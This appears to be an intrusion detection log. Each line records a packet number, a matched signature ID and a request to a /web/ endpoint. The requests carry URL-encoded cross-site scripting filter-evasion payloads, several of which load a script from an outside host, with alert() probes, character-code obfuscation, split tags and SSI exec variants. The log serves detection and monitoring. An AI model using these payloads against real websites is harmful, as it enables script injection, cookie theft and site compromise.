Packet [562]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [563]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [564]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [565]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [566]	Uri [/web/?demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [567]	Uri [/web/?demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [568]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [569]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [574]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [575]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [580]	Uri [/web/?demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [581]	Uri [/web/?demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [592]	Uri [/web/?demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [593]	Uri [/web/?demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [600]	Uri [/web/?demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [601]	Uri [/web/?demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [610]	Uri [/web/?demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [611]	Uri [/web/?demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [626]	Uri [/web/?demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [627]	Uri [/web/?demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [630]	Uri [/web/?demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [631]	Uri [/web/?demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [640]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [641]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [648]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [649]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [710]	Uri [/web/?demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [711]	Uri [/web/?demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [716]	Uri [/web/?demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [717]	Uri [/web/?demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [734]	Uri [/web/?demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [735]	Uri [/web/?demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [736]	Uri [/web/?demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [737]	Uri [/web/?demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [738]	Uri [/web/?demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [739]	Uri [/web/?demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [740]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [741]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [744]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [745]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [766]	Uri [/web/?demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [767]	Uri [/web/?demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [772]	Uri [/web/?demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [773]	Uri [/web/?demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [782]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [783]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [784]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [785]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [786]	Uri [/web/?demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [787]	Uri [/web/?demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [788]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [789]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [794]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [795]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [800]	Uri [/web/?demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [801]	Uri [/web/?demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [812]	Uri [/web/?demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [813]	Uri [/web/?demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [820]	Uri [/web/?demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [821]	Uri [/web/?demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [830]	Uri [/web/?demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [831]	Uri [/web/?demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [846]	Uri [/web/?demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [847]	Uri [/web/?demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [850]	Uri [/web/?demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [851]	Uri [/web/?demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [860]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [861]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [868]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [869]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [930]	Uri [/web/?demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [931]	Uri [/web/?demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [936]	Uri [/web/?demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [937]	Uri [/web/?demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [954]	Uri [/web/?demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [955]	Uri [/web/?demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [956]	Uri [/web/?demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [957]	Uri [/web/?demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [958]	Uri [/web/?demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [959]	Uri [/web/?demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [960]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [961]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [964]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [965]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [986]	Uri [/web/?demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [987]	Uri [/web/?demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [992]	Uri [/web/?demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [993]	Uri [/web/?demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1002]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1003]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1004]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1005]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1006]	Uri [/web/?demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1007]	Uri [/web/?demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1008]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1009]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1014]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1015]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1020]	Uri [/web/?demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1021]	Uri [/web/?demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1032]	Uri [/web/?demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1033]	Uri [/web/?demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1040]	Uri [/web/?demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1041]	Uri [/web/?demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1050]	Uri [/web/?demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1051]	Uri [/web/?demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1066]	Uri [/web/?demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1067]	Uri [/web/?demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1070]	Uri [/web/?demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1071]	Uri [/web/?demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1080]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1081]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1088]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1089]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1150]	Uri [/web/?demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1151]	Uri [/web/?demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
